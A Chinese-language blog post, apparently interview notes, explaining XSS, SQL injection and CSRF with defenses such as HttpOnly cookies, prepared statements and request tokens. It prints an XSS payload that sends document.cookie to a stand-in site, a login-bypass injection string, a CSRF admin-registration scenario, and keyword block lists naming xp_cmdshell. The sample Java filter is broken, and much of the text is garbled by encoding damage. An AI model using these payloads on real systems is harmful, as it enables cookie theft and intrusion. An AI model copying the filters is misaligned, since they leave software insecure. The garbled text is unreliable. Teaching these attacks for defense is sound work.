今天去一家公司面試,這是我畢業之后的第一次跳槽面試����。有點緊張�,面試官問了一下關于前端安全的問題直接把我給問蒙住了。之前一直沒有太留意過這些方面的問題�����?����;貋碇笞约赫伊诵┵Y料看了一下��,做個總結����,以防自己以后再遇到這些尷尬的問題���。
1�、XSS
XSS又叫CSS (Cross Site Script) ,跨站腳本攻擊�。它指的是惡意攻擊者往Web頁面里插入惡意html代碼��,當用戶瀏覽該頁之時,嵌入其中Web里面的html代碼會被執行��,從而達到惡意用戶的特殊目的���。(百度百科)
發生的原理:用戶輸入的數據變成了程序��,并返回到客戶端執行。
分類:
1����、Dom-Based XSS 漏洞 假設有個交友網站(http://xxx.com)存在該漏洞�����。 建立一個自己的網站(http://yyy.com) 構建一個惡意的URL�,發送給其他用戶����。
http://xxx.com/search.asp?user=<script>window.open("http://yyy.com?cookie="+document.cookie)</script>用戶點擊之后會將他的的cookie發送到我們的網站服務器,從而得到用戶的信息。
2���、Stored XSS(存儲式XSS漏洞) 假設某網站存在該漏洞 我通過上傳一片文章���,并在文章中添加一下代碼。并將文章存儲到數據庫中
<script>window.open("http://yyy.com?cookie="+document.cookie)</script>這樣當其他用戶點開該文章的時候就會將他的cookie發送到我們的網站服務器
注:Dom-Based XSS漏洞威脅用戶個體���,而存儲式XSS漏洞所威脅的對象將是大量的用戶
修復:
原則:不相信客戶輸入的數據 注意:攻擊代碼不一定在script中 1. 將重要的cookie標記為http only, 這樣的話javascript 中的document.cookie語句就不能獲取到cookie了��。 2. 只允許用戶輸入我們期望的數據。 例如: 年齡的textbox中,只允許用戶輸入數字����。 而數字之外的字符都過濾掉�����。 3. 對數據進行Html Encode 處理 4. 過濾或移除特殊的Html標簽����, 例如: script,iframe等。 5. 過濾Javascript 事件的標簽�����。例如 “onclick=”, “onfocus” 等等���。
參考: Web安全測試之XSS:http://www.cnblogs.com/TankXiao/archive/2012/03/21/2337194.html
2�����、SQL注入
所謂SQL注入���,就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字符串,最終達到欺騙服務器執行惡意的SQL命令。具體來說,它是利用現有應用程序���,將(惡意)的SQL命令注入到后臺數據庫引擎執行的能力,它可以通過在Web表單中輸入(惡意)SQL語句得到一個存在安全漏洞的網站上的數據庫�,而不是按照設計者意圖去執行SQL語句�����。[1] 比如先前的很多影視網站泄露VIP會員密碼大多就是通過WEB表單遞交查詢字符暴出的,這類表單特別容易受到SQL注入式攻擊�。(百度百科)
場景模擬:
用戶表:users 用戶名和密碼:admin 123456 當我們輸入用戶名和密碼之后����,程序查詢數據庫:
select count(*) from users where username='admin' and passWord='123456'此時驗證通過����,我們登錄成功�����。 假設我們不知道用戶名和密碼��,我們輸入: 用戶名:test’ or 1=1 - - 密碼:123 此時產生的sql語句為:
select count(*) from users where username='test' or 1=1 - - and password='123'兩個-注釋了后續的語句�����,這時候我們同樣可以登錄成功����,獲取該用戶信息���。 注:這只是最簡單的最理想化的場景 詳細請查看:http://www.jb51.net/hack/64764.html
如何預防:
盡量不要使用字符串拼接的方式連接SQL語句。 對于jsp來說:以PReparedStatement代替Statement。PreparedStatement是預編譯的,比Statement速度快。并且代碼的可讀性和可維護性��;PreparedStatement盡最大可能提高性能;最重要的一點是極大地提高了安全性。 對于.NET來說:利用SqlCommand傳參數的方法string strSQL="SELECT * FROM [user] WHERE user_id=@id";SqlCommand cmd = new SqlCommand();cmd.CommandText = strSQL;cmd.Parameters.Add("@id",SqlDbType.VarChar,20).Value=Request["id"].ToString();限制用戶的數據區權限。用不同的用戶帳戶執行查詢���、插入�����、更新、刪除操作�。由于隔離了不同帳戶可執行的操作���,因而也就防止了原本用于執行SELECT命令的地方卻被用于執行INSERT、UPDATE或DELETE命令�����。使用存儲過程進行數據庫操作檢驗用戶輸入數據的合法性�����,過濾掉一些特殊的字符或者是sql關鍵字// js校驗urlvar url = location.search;var re=/^/?(.*)(select%20|insert%20|delete%20from%20|count/(|drop%20table|update%20truncate%20|asc/(|mid/(|char/(|xp_cmdshell|exec%20master|net%20localgroup%20administrators|/"|:|net%20user|/|%20or%20)(.*)$/gi;var e = re.test(url);if(e) { alert("地址中含有非法字符~"); location.href="error.asp";}// .NET過濾sql關鍵字/// <summary>/// 過濾SQL語句,防止注入/// </summary>/// <param name="strSql"></param>/// <returns>0 - 沒有注入, 1 - 有注入 </returns>public int filterSql(string sSql){ int srcLen, decLen = 0; sSql = sSql.ToLower().Trim(); srcLen = sSql.Length; sSql = sSql.Replace("exec", ""); sSql = sSql.Replace("delete", ""); sSql = sSql.Replace("master", ""); sSql = sSql.Replace("truncate", ""); sSql = sSql.Replace("declare", ""); sSql = sSql.Replace("create", ""); sSql = sSql.Replace("xp_", "no"); decLen = sSql.Length; if (srcLen == decLen) return 0; else return 1; }// java過濾sql關鍵字public static String filterContent(String content){ String flt ="'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare|; |or|-|+|,"; Stringfilter[] = flt.split("|"); for(int i=0; i { content.replace(filter[i], ""); } return content; }將用戶登錄名稱�、密碼等數據加密保存�����。檢查提取數據的查詢所返回的記錄數量�。如果程序只要求返回一個記錄����,但實際返回的記錄卻超過一行,那就當作出錯處理���。3、CSRF
CSRF(Cross-site request forgery跨站請求偽造����,也被稱為“One Click Attack”或者session Riding�����,通?�?s寫為CSRF或者XSRF�,是一種對網站的惡意利用���。盡管聽起來像跨站腳本(XSS)����,但它與XSS非常不同,并且攻擊方式幾乎相左。XSS利用站點內的信任用戶,而CSRF則通過偽裝來自受信任用戶的請求來利用受信任的網站����。與XSS攻擊相比��,CSRF攻擊往往不大流行(因此對其進行防范的資源也相當稀少)和難以防范,所以被認為比XSS更具危險性。(百度百科)
場景模擬:
目的:注冊一個管理員賬戶 步驟: 1. 該網站(http://A.com)是采用某種已經搭建好基本框架的程序開發,并且未進行令牌(token)驗證 2. 下載該源碼框架����,并找到管理員注冊界面(mananger.html)的html代碼�。 3. 修改該html的內容�,刪除不必要的代碼。將自己的信息賦值進去�,并編寫js���,當打開這個頁面的時候提交該表單��。表單的action指向(http://A.com/mananger.html) 4. 構建自己的網站(http://B.com)并將B.html存放在自己的放在自己的網站中。 5. 通過站內消息向管理員發送一個鏈接(http://B.com/B.html) 6. 當管理員打開網站之后,就會立即提交我自己寫好的form表單���。(因為此時管理員登錄了且其session并沒有失效) 7. 這時候我的管機員賬號就注冊成功了。 類似如下圖: 
防御方式:
請求令牌(一種簡單有效的防御方法):
首先服務器端要以某種策略生成隨機字符串,作為令牌(token)�����,保存在 Session 里���。然后在發出請求的頁面���,把該令牌以隱藏域一類的形式�����,與其他信息一并發出。在接收請求的頁面��,把接收到的信息中的令牌與 Session 中的令牌比較��,只有一致的時候才處理請求����,處理完成后清理session中的值,否則返回 HTTP 403 拒絕請求或者要求用戶重新登陸驗證身份
注意:
雖然請求令牌原理和驗證碼有相似之處�����,但不應該像驗證碼一樣�,全局使用一個 Session Key。因為請求令牌的方法在理論上是可破解的,破解方式是解析來源頁面的文本,獲取令牌內容�。如果全局使用一個 Session Key�����,那么危險系數會上升。原則上來說,每個頁面的請求令牌都應該放在獨立的 Session Key 中�。我們在設計服務器端的時候�����,可以稍加封裝,編寫一個令牌工具包,將頁面的標識作為 Session 中保存令牌的鍵�����。在 Ajax 技術應用較多的場合����,因為很有請求是 JavaScript 發起的���,使用靜態的模版輸出令牌值或多或少有些不方便����。但無論如何,請不要提供直接獲取令牌值的 API���。這么做無疑是鎖上了大門,卻又把鑰匙放在門口�,讓我們的請求令牌退化為同步令牌�����。第一點說了請求令牌理論上是可破解的,所以非常重要的場合���,應該考慮使用驗證碼(令牌的一種升級,目前來看破解難度極大)�,或者要求用戶再次輸入密碼(亞馬遜���、淘寶的做法)����。但這兩種方式用戶體驗都不好��,所以需要產品開發者權衡���。無論是普通的請求令牌還是驗證碼���,服務器端驗證過一定記得銷毀。忘記銷毀用過的令牌是個很低級但是殺傷力很大的錯誤。我們學校的選課系統就有這個問題�,驗證碼用完并未銷毀�����,故只要獲取一次驗證碼圖片,其中的驗證碼可以在多次請求中使用(只要不再次刷新驗證碼圖片),一直用到�。如下也列出一些據說能有效防范 CSRF�����,其實效果甚微或甚至無效的做法:
通過 referer 判定來源頁面:referer 是在 HTTP Request Head 里面的,也就是由請求的發送者決定的��。如果我喜歡�,可以給 referer 任何值。當然這個做法并不是毫無作用�����,起碼可以防小白��。但我覺得性價比不如令牌���。過濾所有用戶發布的鏈接:這個是最無效的做法�����,因為首先攻擊者不一定要從站內發起請求(上面提到過了)����,而且就算從站內發起請求���,途徑也遠遠不知鏈接一條�����。比如 img src=”./create_post.php” 就是個不錯的選擇,還不需要用戶去點擊,只要用戶的瀏覽器會自動加載圖片,就會自動發起請求�。在請求發起頁面用 alert 彈窗提醒用戶:這個方法看上去能干擾站外通過 iframe 發起的 CSRF�����,但攻擊者也可以考慮用 window.alert = function(){}; 把 alert 弄啞,或者干脆脫離 iframe����,使用 Flash 來達到目的���。總體來說�����,目前防御 CSRF 的諸多方法還沒幾個能徹底無解的。 作為開發者,我們能做的就是盡量提高破解難度���。當破解難度達到一定程度,網站就逼近于絕對安全的位置了
參考: 從零開始學CSRF:http://www.freebuf.com/articles/web/55965.html 漏洞科普:對于XSS和CSRF你究竟了解多少:http://www.freebuf.com/articles/web/39234.html
未完待續。�。���。
